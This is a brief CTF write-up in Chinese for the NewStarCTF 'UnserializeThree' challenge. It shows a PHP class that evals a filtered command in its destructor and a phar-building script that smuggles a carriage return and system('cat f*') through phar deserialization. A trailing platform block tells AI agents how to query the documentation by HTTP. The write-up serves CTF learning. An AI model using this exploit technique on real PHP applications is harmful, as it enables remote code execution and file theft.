# \[WEEK4]UnserializeThree

class.php

```
<?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function __destruct()
    {
        if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
            //Same point ,can you bypass me again?
            eval("#".$this->cmd);
        }else{
            echo "No!";
        }
    }
}

file_exists($_GET['file']);
```

明显的phar反序列化，其中存在注释符需要绕过，只过滤了0a，直接抄exp

```
<?php
#要把php.ini中的phar.readonly设置成Off，不然无法生成phar文件

class Evil {
    public $cmd;
}

$a = new Evil();
$a->cmd=urldecode("%0d")."system('cat f*');";
$phar = new Phar("aa.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a);//将自定义的meta-data存入manifest，且这部分是以序列化的形式存在
$phar->addFromString("test.txt", "test"); //添加要压缩的文件,因为phar相当于一个解压缩，前提就是要现有.phar文件，然后又因为meta-data是由序列化存储，这边添加一个压缩文件包，就是为了在用phar://伪协议的时候触发meta-data的反序列化
$phar->stopBuffering();//签名自动计算
?>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2022/2022-newstarctf/week4-unserializethree.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.